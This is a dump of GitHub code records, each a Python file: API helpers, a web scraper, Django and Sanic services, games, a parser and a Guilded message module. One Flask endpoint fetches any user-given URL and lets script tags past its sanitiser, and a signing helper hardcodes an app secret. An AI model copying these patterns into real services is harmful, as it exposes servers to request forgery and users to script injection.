Args:\n url (str): duh!\n data (params): *args\n\n Returns:\n requests: full response\n \"\"\"\n return requests.post(url, auth=(_CLIENT, _TOKEN), data=data)\n\ndef get_api(url):\n \"\"\"Send a GET request to the API, after asking for a new oauth token.\n\n Args:\n url (str): -_-\n\n Returns:\n json: full json response\n \"\"\"\n payload = {\"locale\" : \"en_US\", \"access_token\": get_access_token()}\n r = requests.get(url, params=payload)\n if r.status_code == 200:\n response = json.loads(r.content)\n return response\n return r.status_code\n","repo_name":"gvieralopez/SC2Helperbot","sub_path":"APIs/blizzard.py","file_name":"blizzard.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"13182696680","text":"# Archivo que levanta datos de Mercado Libre ################\n############################################################# \n\npageUrl= \"https://listado.mercadolibre.com.ar/autos-usados\"\ndriver = webdriver.Firefox(executable_path = 'geckodriver')\n\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport sqlite3\nimport pandas as pd\nfrom csv import writer\nfrom datetime import datetime\n\n#Funcion para traer un url de X pagina\ndef get_page_url(pageNumber, marca):\n initial_range = 1 + 48 * (pageNumber - 1)\n base_page_url = \"https://autos.mercadolibre.com.ar/\"\n base_page_url = base_page_url + marca + '/autos-usados_Desde_{}_ITEM*CONDITION_2230581_NoIndex_True'.format(initial_range)\n return base_page_url\n\n#Funcion para traer los objetos de la publicacion\ndef publication_object(car_publication,marca):\n #Obtiene el precio\n price = car_publication.find(class_=\"price-tag-fraction\").text\n price.replace(\".\",\",\")\n \n #Obtiene la moneda\n currency = car_publication.find(class_=\"price-tag-symbol\").text\n \n #Obtiene la ubicación\n ubication = 
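# Usage sketch for the ladder helpers above. The profile ID is made up, and
# the response field names follow Blizzard's SC2 community API (treat them
# as an assumption).
summary = get_ladder_summary(profileId=1234567)
if isinstance(summary, dict):
    for entry in summary.get('allLadderMemberships', []):
        print(entry.get('ladderId'), entry.get('rank'))
else:
    print('Request failed with HTTP status', summary)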
car_publication.find(class_=\"ui-search-item__location\").text\n ubication = ubication.split(\" - \")\n localidad = ubication[0]\n try:\n provincia = ubication[1]\n except:\n provincia = \"\"\n \n #Obtiene el KM\n year = car_publication.find_all(class_=\"ui-search-card-attributes__attribute\")[0].text\n\n #Obtiene el Año\n km = car_publication.find_all(class_=\"ui-search-card-attributes__attribute\")[1].text\n km = km.split(\" \")\n km = km[0]\n \n #Obtiene la marca\n marca = marca\n \n #Obtiene el titulo\n title = car_publication.find(class_=\"ui-search-item__title\").text\n \n #Me devuelve la fecha actual\n current_date = datetime.now().date()\n \n return {\"precio\": price,\n \"currency\": currency,\n \"localidad\": localidad,\n \"provincia\": provincia,\n \"km\": km, \n \"year\": year,\n \"marca\": marca,\n \"title\": title,\n \"visto\": current_date}\n \n \n#Funcion que recorre todas las publicaciones de una pagina\ndef parser_and_save_items(pageUrl,marca):\n #Voy a la pagina que quiero scrapear\n driver.get(pageUrl)\n #Obtengo su HTML\n html_code = driver.page_source\n #Creo un objeto a partir del HTML\n soup = BeautifulSoup(html_code, 'lxml')\n #Trae todas las publiaciones de la pagina actual\n all_publication = soup.find_all(\"li\", class_=\"ui-search-layout__item\")\n \n #Convierte las publicaciones en objetos\n df = pd.DataFrame()\n \n for car_publication in all_publication:\n # print(publication_object(car_publication))\n # Buco los atributos\n data = publication_object(car_publication,marca)\n df_new = pd.DataFrame(data,index = [0])\n df = df.append(df_new, ignore_index = True)\n \n export_data(df)\n print('exportado')\n\n#Funcion para exportar data a un .csv\ndef export_data(df):\n df.to_csv('data_publications.csv',mode='a', sep=';', encoding='utf-8-sig', index=False, header=False)\n \n# Itera por todas las páginas y guarda información en el csv\n\nmarcas = ['volkswagen', 'ford', 'renault', 'peugeot', 'chevrolet', 'toyota', 'fiat', 'audi', 'citroen','audi']\n\nfor marca in marcas:\n for actual_number_page in range(1,35+1):\n \n url_page = get_page_url(actual_number_page,marca)\n print(url_page)\n parser_and_save_items(url_page,marca)\n\n# Para levantar la URL de la imagen\n# img = car_publication.find('img')\n\n# try:\n# img_url = all_house_li[0].find('img')['data-src']\n# except:\n# img_url = all_house_li[0].find('img')['src']\n","repo_name":"lucialopezwallace/tesis-mim","sub_path":"meli-scrapper.py","file_name":"meli-scrapper.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31278590364","text":"from datetime import date\nimport requests\n\nfrom core.models import Answer, AnswerEvaluation\nfrom utils.convertDate import convertDate\n\n\nclass AnswerService:\n @staticmethod\n def getAnswersOfQuestion(questionId):\n answers = Answer.objects.filter(question_id=questionId, status='ACCEPTED').order_by('-created_at')\n for answer in answers:\n answer.created_at = convertDate(answer.created_at)\n answer.evaluations = AnswerEvaluation.objects \\\n .filter(answer_id=answer.id) \\\n .values('user_id', 'evaluation_type')\n\n userResponse = requests.get(f'http://127.0.0.1:8000/api/users/{answer.user_id}/owner-info')\n user = userResponse.json()['data']\n answer.user = user\n return answers\n\n @staticmethod\n def createAnswer(data):\n answer = Answer.objects.create(\n user_id=data['user_id'],\n question_id=data['question_id'],\n content=data['content'],\n 
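# Worked check of the pagination offset in get_page_url() above: Mercado
# Libre lists 48 results per page, so page 2 starts at item 49.
assert 1 + 48 * (2 - 1) == 49
print(get_page_url(2, 'ford'))
# -> https://autos.mercadolibre.com.ar/ford/autos-usados_Desde_49_ITEM*CONDITION_2230581_NoIndex_True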
reference=data['reference'],\n image=data['image'],\n status='WAITING',\n created_at=date.today()\n )\n answer.created_at = convertDate(answer.created_at)\n answer.evaluations = AnswerEvaluation.objects \\\n .filter(answer_id=answer.id) \\\n .values('user_id', 'evaluation_type')\n\n userResponse = requests.get(f'http://127.0.0.1:8000/api/users/{answer.user_id}/owner-info')\n user = userResponse.json()['data']\n answer.user = user\n\n return answer\n\n @staticmethod\n def createOrUpdateEvaluation(answerId, userId, evaluationType):\n if AnswerEvaluation.objects.filter(answer_id=answerId, user_id=userId).exists():\n AnswerEvaluation.objects.filter(answer_id=answerId, user_id=userId) \\\n .update(evaluation_type=evaluationType)\n return 'Update success'\n else:\n AnswerEvaluation.objects.create(answer_id=answerId, user_id=userId, evaluation_type=evaluationType)\n return 'Create success'\n\n @staticmethod\n def getAnswersOfQuestionOrderByNewest(questionId, pageNumber):\n totalRecords = Answer.objects.filter(question_id=questionId).count()\n\n page_size = 6\n offset = (pageNumber - 1) * page_size\n limit = offset + page_size if offset + page_size <= totalRecords else totalRecords\n\n answers = Answer.objects.filter(question_id=questionId).order_by('-created_at', '-status')[offset:limit]\n\n return answers\n\n @staticmethod\n def getDetailAnswerById(answerId):\n answer = Answer.objects.get(id=answerId)\n return answer\n\n @staticmethod\n def countAnswersOfQuestion(questionId):\n return Answer.objects.filter(question_id=questionId).count()\n\n @staticmethod\n def deleteAnswerForever(answerId):\n Answer.objects.filter(id=answerId, status=\"WAITING\").delete()\n\n @staticmethod\n def updateAnswerStatus(answerId):\n Answer.objects.filter(id=answerId, status=\"WAITING\").update(status=\"ACCEPTED\")\n\n @staticmethod\n def getAllAnswer():\n answers = Answer.objects.all()\n return answers\n\n @staticmethod\n def getPendingAnswer():\n question = Answer.objects.filter(status=\"WAITING\")\n return question\n","repo_name":"HTTT-MDM-DA/viet-intel-social","sub_path":"server/answer/core/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14501159897","text":"from typing import List\n\n\nclass state:\n def __init__(self, v= ''):\n self.value = v\n self.distance = 0 #define as amount of different letters\n self.children = []\n self.step = 0\n def setDistance(self, target):\n dis = 0\n if len(self.value) != len(target.value) :\n return None\n for i in range(len(self.value)):\n if self.value[i] != target.value[i] :\n dis += 1\n self.distance = dis\n return self.distance\n\n def calDistance(self, otherString):\n dis = 0\n if len(self.value) != len(otherString) :\n return None\n for i in range(len(self.value)):\n if self.value[i] != otherString[i] :\n dis += 1\n return dis\n\nclass Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n if endWord not in wordList :\n return 0\n wordList.remove(endWord)\n startState = state(endWord)\n startState.step = 1\n endState = state(beginWord)\n startState.setDistance(endState)\n stack = []\n stack.append(startState)\n while stack and wordList:\n top = stack[0]\n stack = stack[1:]\n index = 0\n while index < len(wordList) :\n if top.calDistance(wordList[index]) == 1 :\n newState = state(wordList[index])\n newState.step = top.step+1\n newState.setDistance(endState)\n if newState.distance == 1:\n return 
newState.step\n top.children.append(newState)\n stack.append(newState)\n del wordList[index]\n else:\n index += 1\n return 0\n\nif __name__ == '__main__':\n ss = Solution()\n print(ss.ladderLength(\"hit\",\"cog\",[\"hot\",\"dot\",\"dog\",\"lot\",\"log\",\"cog\"]))","repo_name":"UnbearableFate/exercises","sub_path":"leetcode_127_medium/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22904402408","text":"from ursina import *\r\nfrom ursina.prefabs.first_person_controller import FirstPersonController\r\n\r\napp = Ursina()\r\ngrass_texture = load_texture('assets/grass_block.png')\r\nstone_texture = load_texture('assets/stone_block.png')\r\nwood_texture = load_texture('assets/wood_block.png')\r\ndirt_texture = load_texture('assets/dirt_block.png')\r\nblock_pick = 1\r\nblocks=[\"\",\"Grass\",\"Stone\",\"Wood\",\"Dirt\"]\r\nwindow.fps_counter.enabled = False\r\nwindow.borderless = False\r\nwindow.exit_button.visible = False\r\nwindow.title = 'PyCraft'\r\ndef update():\r\n\tglobal block_pick\r\n\r\n\tText.default_resolution = 1080 * Text.size\r\n\r\n\r\n\tif held_keys['1']: block_pick = 1\r\n\tif held_keys['2']: block_pick = 2\r\n\tif held_keys['3']: block_pick = 3\r\n\tif held_keys['4']: block_pick = 4\r\n\tif held_keys['5']: block_pick = 5\r\n\tif held_keys['tab']:\r\n\t\t mouse.locked = False\r\n\tif held_keys['enter']:\r\n\t\tmouse.locked = True\r\n\tif held_keys['escape']: app.quit()\r\nclass Voxel(Button):\r\n\tdef __init__(self, position = (0,0,0), texture = grass_texture):\r\n\t\tsuper().__init__(\r\n\t\t\tparent = scene,\r\n\t\t\tposition = position,\r\n\t\t\tmodel = 'assets/block',\r\n\t\t\torigin_y = 0.5,\r\n\t\t\ttexture = texture,\r\n\t\t\tcolor = color.color(0,0,random.uniform(0.9,1)),\r\n\t\t\tscale = 0.5)\r\n\r\n\tdef input(self,key):\r\n\t\tif self.hovered:\r\n\t\t\tif key == 'left mouse down':\r\n\t\t\t\tif block_pick == 1: voxel = Voxel(position = self.position + mouse.normal, texture = grass_texture)\r\n\t\t\t\tif block_pick == 2: voxel = Voxel(position = self.position + mouse.normal, texture = stone_texture)\r\n\t\t\t\tif block_pick == 3: voxel = Voxel(position = self.position + mouse.normal, texture = wood_texture)\r\n\t\t\t\tif block_pick == 4: voxel = Voxel(position = self.position + mouse.normal, texture = dirt_texture)\r\n\t\t\tif key == 'right mouse down':\r\n\t\t\t\tdestroy(self)\r\n\r\nfor z in range(20):\r\n\tfor x in range(20):\r\n\t\tvoxel = Voxel(position = (x,0,z))\r\n\r\nplayer = FirstPersonController()\r\n\r\napp.run()\r\n","repo_name":"leodev12345/pycraft","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21874689310","text":"# 본인은 어렵게 구현했지만, 사실 선행되어야 하는 과제가\n# 앞에 나온 과제들로 구성되어 있기 때문에\n# 받아와서 바로 길이를 구성하면 된다.\n# 그러면 연결도 안 해도 되고 해싱도 할 필요가 없다.\n\nfrom collections import deque\nimport sys\n\ninput = sys.stdin.readline\nn = int(input())\nlink = [set() for _ in range(n)]\nlink_reverse = {}\nlink_count = [0] * n\ntime = [0] * n\ndp = [0] * n\nq = deque()\nfor i in range(n):\n num_and_list = list(map(int, input().split()))\n time[i] = num_and_list[0]\n link_count[i] = num_and_list[1]\n if link_count[i] == 0:\n q.append(i)\n for j in range(link_count[i]):\n obj_link = num_and_list[2 + j] - 1\n link[obj_link].add(i)\n link_reverse[i] = set(map(lambda X: X - 1, num_and_list[2:]))\nresult 
= 0\n\nwhile q:\n core = q.popleft()\n pre_max = 0\n for pre in link_reverse[core]:\n pre_max = max(pre_max, dp[pre])\n dp[core] = pre_max + time[core]\n if dp[core] > result:\n result = dp[core]\n for next_link in link[core]:\n link_count[next_link] -= 1\n if not link_count[next_link]:\n q.append(next_link)\nprint(result)","repo_name":"Rekalux/Algorithm-etc","sub_path":"Only Algorithm/Year2021/Day0309/Boj_2056.py","file_name":"Boj_2056.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13339660943","text":"import random\nfrom turtle import Turtle\n\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\nWIDTH = 1\nHEIGHT = 2\n\n\nclass CarManager:\n\n def __init__(self):\n self.all_cars = []\n self.speed = STARTING_MOVE_DISTANCE\n\n def create_car(self):\n random_chance = random.randint(1, 6)\n if random_chance == 1:\n new_car = Turtle()\n new_car.shape(\"square\")\n new_car.shapesize(stretch_wid=WIDTH, stretch_len=HEIGHT)\n new_car.color(random.choice(COLORS))\n new_car.penup()\n rand_y = random.randint(-250, 250)\n new_car.goto(300, rand_y)\n self.all_cars.append(new_car)\n\n def move_car(self):\n for car in self.all_cars:\n car.backward(self.speed)\n\n def up_speed(self):\n self.speed += MOVE_INCREMENT\n","repo_name":"dzmitryboika1/the_turtle_crossing_capstone_game","sub_path":"car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73089304571","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
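# The (Korean) header comment of Boj_2056.py says: because every
# prerequisite task has a smaller number than the task itself, the input can
# be consumed in order and the answer computed directly, with no adjacency
# sets or hashing. A sketch of that simpler approach:
def critical_path(times, prereqs):
    # times[i]: duration of task i; prereqs[i]: indices of earlier tasks
    dp = [0] * len(times)
    for i, t in enumerate(times):
        dp[i] = t + max((dp[p] for p in prereqs[i]), default=0)
    return max(dp, default=0)

assert critical_path([10, 10, 4], [[], [0], [0, 1]]) == 24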
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom django.conf.urls import patterns\nfrom django.conf.urls import url\n\nfrom openstack_dashboard.dashboards.project.stacksd import views\n\nurlpatterns = patterns(\n '',\n url(r'^$',views.IndexView.as_view(), name='index'),\n url(r'^get_d3_data/(?P[^/]+)/$',\n views.JSONView.as_view(), name='d3_data'),\n url(r'^formI/(?P[^/]+)/$',views.InstanceFormView.as_view(), name='formI'),\n url(r'^formD/(?P[^/]+)/$',views.DatabaseFormView.as_view(), name='formD'),\n url(r'^formLB/(?P[^/]+)/$',views.LoadBalancerFormView.as_view(), name='formLB'),\n url(r'^create/(?P\\d+)/$',views.ResourcesView.as_view(), name='create'),\n url(r'^del/(?P[^/]+)/$',views.RemoveNode.as_view(), name='del'),\n)\n","repo_name":"SujayBothe/Template-Generator","sub_path":"stacksd/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20274658410","text":"from collections import defaultdict\nimport re\n\ndef strip_comments(c):\n return re.sub(r'^\\s*;.+\\n', '', c, flags=re.MULTILINE)\n\ndef strip_newlines(c):\n return re.sub(r'\\n', '', c, flags=re.MULTILINE)\n\ndef get_concepts(c):\n return re.findall(r'concept (\\w+)\\s*{-\\s*(.*?)-}', c, flags=re.MULTILINE | re.DOTALL) \n\ndef get_statements(c):\n return map(lambda s: s.strip(), re.findall(r'([^;]+);', c))\n\ndef parse_definition(d):\n d = d.strip()\n\n what = None\n ser = None\n\n r_primitive = r'^([a-z]+)'\n r_primitive_param = r'^[a-z]+<(.+)>'\n r_literal = r'\"([^\"]+)\"'\n r_tuple = r'\\((.+)\\)'\n r_serializer = r'.+->(.+)'\n\n serializer = re.findall(r_serializer, d)\n \n #get the serializer first\n if serializer:\n (d, serializer) = d.split(\"->\")\n d = d.strip()\n ser = serializer.strip()\n\n primitive = re.findall(r_primitive, d)\n literal_set = re.findall(r_literal, d)\n named_tuple = re.findall(r_tuple, d)\n\n if primitive:\n what = {\n 'type': 'Primitive',\n 'value': primitive[0]\n }\n primitive_param = re.findall(r_primitive_param, d)\n if primitive_param:\n what['params'] = primitive_param[0].split(',')\n elif literal_set:\n what = {\n 'type': 'LiteralSet',\n 'value': literal_set[0].split('|')\n }\n elif named_tuple:\n fields = []\n field_pieces = named_tuple[0].split(\",\")\n for field in field_pieces:\n field = field.strip()\n (name,ttype) = field.split(\":\")\n fields.append({\n 'name': name,\n 'type': ttype\n })\n\n what = {\n 'type': 'Tuple',\n 'value': fields,\n 'serializer': ser\n }\n\n return what\n\ndef get_concepts_from_text(content):\n concepts_parsed = []\n\n content = strip_comments(content)\n content = strip_newlines(content)\n concepts = get_concepts(content)\n for name, inner in concepts:\n statements = get_statements(inner)\n concept_dict = {}\n concept_dict['name'] = name\n concept_dict['definitions'] = {}\n concept_dict['attrs'] = {}\n\n for statement in statements:\n statement = strip_newlines(statement);\n def_tuple = re.findall(r'([A-Z]\\w+\\s*)=(.+)', statement)\n attr_tuple = re.findall(r'@(.+?)\\s*=(.+)', statement)\n if def_tuple:\n (identifier, definition) = def_tuple[0]\n def_parsed = parse_definition(definition)\n concept_dict['definitions'][identifier.strip()] = def_parsed\n elif attr_tuple:\n (attr, attr_val) = attr_tuple[0]\n concept_dict['attrs'][attr.strip()] = attr_val.strip()\n concepts_parsed.append(concept_dict)\n return 
concepts_parsed\n","repo_name":"elimgoodman/spiral-python","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"25459205829","text":"from blinker import signal\nfrom pd.bot.commands import create_bot, update_game_left_share\nfrom pd.groupon.factory import UserFactory, BatchFactory, OrderFactory\nfrom pd.payment.factory import PaymentFactory\nfrom pd.groupon.models import Order\n\n\ndef test_create_bot(app_context):\n from pd.facebook.schema import UserSchema\n\n bot = create_bot('blah', 'helms')\n assert bot.is_bot\n assert bot.name == 'helms'\n\n dumped = UserSchema().dump(bot).data\n assert dumped['name'] == 'helms'\n\n\ndef test_update_game_left_share(db_session):\n user = UserFactory()\n batch = BatchFactory(total_shares=5)\n for _ in range(10):\n UserFactory(is_bot=True)\n game = batch.create_game()\n db_session.flush()\n order = OrderFactory(game=game, user=user)\n game.left_shares = 3\n db_session.commit()\n update_game_left_share()\n orders = Order.query.filter(Order.game == game).all()\n bot_user = 0\n for o in orders:\n if o.user.is_bot:\n bot_user += 1\n assert len(orders) == 3, bot_user == 2\n payment = PaymentFactory(object=order, user=order.user)\n signal('payment_created').send(payment)\n signal('payment_succeeded').send(payment)\n db_session.commit()\n assert len(game.users) == 3\n\n batch = BatchFactory(total_shares=5)\n game = batch.create_game()\n update_game_left_share()\n assert not game.users\n","repo_name":"alinzel/NOTES","sub_path":"other/panda365/panda365/pd/bot/tests/test_bot_commands.py","file_name":"test_bot_commands.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37902317181","text":"import os\nfrom flask import Flask, request, jsonify\nimport requests\nimport bleach\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello():\n\treturn 'Hello There, from DataWave.'\n\n@app.route('/stream')\ndef stream():\n\turl = request.args.get('url')\n\tr = requests.get(url)\n\tattrs = {'*': ['style']}\n\ttags = ['p', 'em', 'strong', 'script', 'style', 'link']\n\tstyles = ['color', 'font-weight']\n\tresult = bleach.clean( r.text, attrs, tags, styles)\n\tsanitized_result = {'data':{'url':url, 'body': [result]}}\n\treturn jsonify(sanitized_result)\n\nif __name__ == '__main__':\n\tapp.run(debug=True)","repo_name":"datawaveteam/DatawaveServer","sub_path":"datawave-obsolete.py","file_name":"datawave-obsolete.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"19731665774","text":"from PyQt5.QtWidgets import QSlider, QStyle\n\nclass PlayerSlider(QSlider):\n def __init__(self, parent=None):\n super().__init__()\n self.parent = parent\n self.setFixedHeight(5)\n self.setStyleSheet(\"\"\"QSlider::groove:horizontal {\n border: 1px solid red;\n height: 6px;\n margin: 2px 0;\nborder-radius: 3px;\n}\nQSlider::handle:horizontal {\n background: red;\n border: 1px solid red;\n width: 3px;\n margin: -8px 0;\n border-radius: 1px;\n}\nQSlider::add-page:horizontal {\n background: lightgray;\n}\nQSlider::sub-page:horizontal {\n background: red;\n}\"\"\")\n\n\n def mousePressEvent(self, event):\n self.setValue(QStyle.sliderValueFromPosition(self.minimum(), self.maximum(), event.x(), self.width()))\n self.sliderMoved.emit((event.x() / self.width()) * 
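# Tiny round-trip of parse_definition() above on a literal-set definition:
assert parse_definition(' "red|green|blue" ') == {
    'type': 'LiteralSet',
    'value': ['red', 'green', 'blue'],
}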
self.maximum())\n\n\n def mouseMoveEvent(self, event):\n self.setValue(QStyle.sliderValueFromPosition(self.minimum(), self.maximum(), event.x(), self.width()))\n self.sliderMoved.emit((event.x() / self.width()) * self.maximum())\n\n\nclass SoundSlider(PlayerSlider):\n pass","repo_name":"mthnzbk/pisi-player","sub_path":"pisiplayer/baritems/slider.py","file_name":"slider.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"26742002273","text":"import sanic\nimport logging\nfrom sanic_cors import CORS\n\napp = sanic.Sanic('data-analysis-project-01')\nCORS(app)\nlogging.basicConfig(\n level=logging.INFO,\n format='[%(asctime)s] [%(levelname)s] %(message)s'\n)\n\n\n@app.get('/server')\nasync def server(request):\n return sanic.response.json({\"message\": \"server : on\"}, 200)\n\nif __name__ == \"__main__\":\n app.run(\n host='0.0.0.0',\n port=3000,\n debug=False,\n access_log=True,\n auto_reload=True,\n dev=True\n )\n","repo_name":"phedrohenriique/data-analysis-project-01","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32074870649","text":"# -*- coding: utf-8 -*-\n# @ProjectName:Python_InterfaceAutoTest\n# @Author: dudu.zhang\n# @File: get_appSecret_MD5.py\n# @Time: 2019-08-18 15:23\n\nimport hashlib\nfrom collections import OrderedDict\n\nfrom six import iteritems\n\n\ndef getAppSecretMD5(data):\n appSecret = '57e458173ec544cfb8c6b28d85165cb3'\n\n sorted_data = OrderedDict(sorted(iteritems(data)))\n\n # convert all str to unicode\n for k, v in sorted_data.items():\n if isinstance(v, str):\n # sorted_data[k] = v.decode('utf-8', errors='ingore')\n sorted_data[k] = v\n raw = '&'.join(\n '%s=%s' % (k, v) for k, v in sorted_data.items()) + appSecret\n\n\n # hash = hashlib.md5()\n # hash.update(raw.encode(encoding='utf-8'))\n\n #md5 = hash.hexdigest()\n # return md5\n\n m = hashlib.md5(raw.encode('utf-8', errors='ingore'))\n sign = m.hexdigest()\n data['sign'] = sign\n return data\n","repo_name":"wengaou/Python_InterfaceAutoTest","sub_path":"utils/get_appSecret_MD5.py","file_name":"get_appSecret_MD5.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33742089675","text":"import asyncio\nimport datetime\nfrom enum import Enum\nimport logging\nfrom typing import Any, Dict, Optional, List\n\nfrom .embed import Embed\nfrom .enums import try_enum, FormType, MessageType, MentionType, MessageFormInputType, MediaType\nfrom .errors import HTTPException\nfrom .file import Attachment\nfrom .utils import ISO8601, parse_hex_number\n\nlog = logging.getLogger(__name__)\n\n\nclass MessageForm:\n def __init__(self, *, state, id):\n self._state = state\n self.id = id\n\n async def fetch(self):\n data = await self._state.get_form_data(self.id)\n return MessageForm.from_dict(data, state=self._state)\n\n @classmethod\n def from_dict(cls, data, *, state, responses=None):\n my_response = data.get('customFormResponse') or {}\n cls.my_response = MessageFormResponse(my_response)\n\n data = data.get('customForm', data)\n if isinstance(responses, dict):\n responses = responses.get('customFormResponses', responses)\n else:\n responses = []\n\n cls.id = data.get('id')\n cls.title = data.get('title', '')\n cls.description = data.get('description', '')\n cls.type = try_enum(FormType, 
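# Quick check of the click-to-seek mapping emitted above: clicking 25% of
# the way across a 0..1000 slider should map to 250.
width, maximum, x = 400, 1000, 100
assert int((x / width) * maximum) == 250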
data.get('type'))\n cls.team_id = data.get('teamId')\n cls.team = state._get_team(cls.team_id)\n cls.author_id = data.get('createdBy')\n cls.author = state._get_team_member(cls.team_id, cls.author_id)\n cls.created_at = ISO8601(data.get('createdAt'))\n cls.updated_at = ISO8601(data.get('updatedAt'))\n cls.response_count = int(data.get('responseCount', 0))\n cls.activity_id = data.get('activityId')\n\n form_specs = data.get('formSpecs', {})\n cls.valid = form_specs.get('isValid')\n sections = ((form_specs.get('sections') or [{}])[0].get('fieldSpecs') or [{}])\n cls.sections = [MessageFormSection(section) for section in sections]\n\n cls.public = data.get('isPublic', False)\n cls.deleted = data.get('isDeleted', False)\n\n return cls\n\n @property\n def options(self):\n try:\n return self.sections[0].options\n except IndexError:\n return []\n\n\nclass MessageFormSection:\n def __init__(self, data):\n self.grow = data.get('grow') # not sure what this is\n self.input_type = try_enum(MessageFormInputType, data.get('type'))\n self.label = data.get('label', '')\n self.header = data.get('header', '')\n self.optional = data.get('isOptional')\n self.default_value = data.get('defaultValue')\n self.field_name = data.get('fieldName')\n\n self.options = [MessageFormOption(option) for option in data.get('options', [])]\n\n @property\n def name(self):\n return self.label\n\n\nclass MessageFormOption:\n def __init__(self, data):\n pass\n\n\nclass MessageFormResponse:\n def __init__(self, data):\n pass\n\n\nclass MessageMention:\n \"\"\"A mention within a message. Due to how mentions are sent in message\n payloads, you will usually only have :attr:`.id` unless the object was\n cached prior to this object being constructed.\n\n Attributes\n -----------\n type: :class:`MentionType`\n The type of object this mention is for.\n id: Union[:class:`str`, :class:`int`]\n The object's ID.\n name: Optional[:class:`str`]\n The object's name, if available.\n \"\"\"\n def __init__(self, mention_type: MentionType, id, *, name=None):\n self.type = mention_type\n self.id = id\n self.name = name\n\n def __str__(self):\n return self.name or ''\n\n\n# This doesn't really need to be how it is and may be changed later.\n# This class only exists to store these static values.\nclass Mention(Enum):\n \"\"\"Used for passing special types of mentions to :meth:`~.abc.Messageable.send`\\.\"\"\"\n everyone = 'everyone'\n here = 'here'\n\n def __str__(self):\n return f'@{self.name}'\n\n def to_node_dict(self) -> Dict[str, Any]:\n if self.value == 'everyone':\n mention_data = {\n 'type': 'everyone',\n 'matcher': '@everyone',\n 'name': 'everyone',\n 'description': 'Notify everyone in the channel',\n 'color': '#ffffff',\n 'id': 'everyone',\n }\n elif self.value == 'here':\n mention_data = {\n 'type': 'here',\n 'matcher': '@here',\n 'name': 'here',\n 'description': 'Notify everyone in this channel that is online and not idle',\n 'color': '#f5c400',\n 'id': 'here',\n }\n\n return {\n 'object': 'inline',\n 'type': 'mention',\n 'data': {\n 'mention': mention_data,\n },\n 'nodes': [{\n 'object': 'text',\n 'leaves': [{\n 'object': 'leaf',\n 'text': str(self),\n 'marks': [],\n }],\n }],\n }\n\n\nclass Link:\n \"\"\"A link within a message. 
Basically represents a markdown link.\"\"\"\n def __init__(self, url, *, name=None, title=None):\n self.url = url\n self.name = name\n self.title = title\n\n def __str__(self):\n return self.url\n\n\nclass HasContentMixin:\n def __init__(self):\n self.mentions: list = []\n self.emojis: list = []\n self.raw_mentions: list = []\n self.channel_mentions: list = []\n self.raw_channel_mentions: list = []\n self.role_mentions: list = []\n self.raw_role_mentions: list = []\n self.embeds: list = []\n self.attachments: list = []\n self.links: list = []\n\n def _get_full_content(self, data):\n try:\n nodes = data['document']['nodes']\n except KeyError:\n # empty message\n return ''\n\n content = ''\n for node in nodes:\n node_type = node['type']\n if node_type == 'paragraph':\n for element in node['nodes']:\n if element['object'] == 'text':\n for leaf in element['leaves']:\n if not leaf['marks']:\n content += leaf['text']\n else:\n to_mark = '{unmarked_content}'\n marks = leaf['marks']\n for mark in marks:\n if mark['type'] == 'bold':\n to_mark = '**' + to_mark + '**'\n elif mark['type'] == 'italic':\n to_mark = '*' + to_mark + '*'\n elif mark['type'] == 'underline':\n to_mark = '__' + to_mark + '__'\n elif mark['type'] == 'strikethrough':\n to_mark = '~~' + to_mark + '~~'\n elif mark['type'] == 'spoiler':\n to_mark = '||' + to_mark + '||'\n else:\n pass\n content += to_mark.format(\n unmarked_content=str(leaf['text'])\n )\n if element['object'] == 'inline':\n if element['type'] == 'mention':\n mentioned = element['data']['mention']\n if mentioned['type'] == 'role':\n content += f'<@{mentioned[\"id\"]}>'\n elif mentioned['type'] == 'person':\n content += 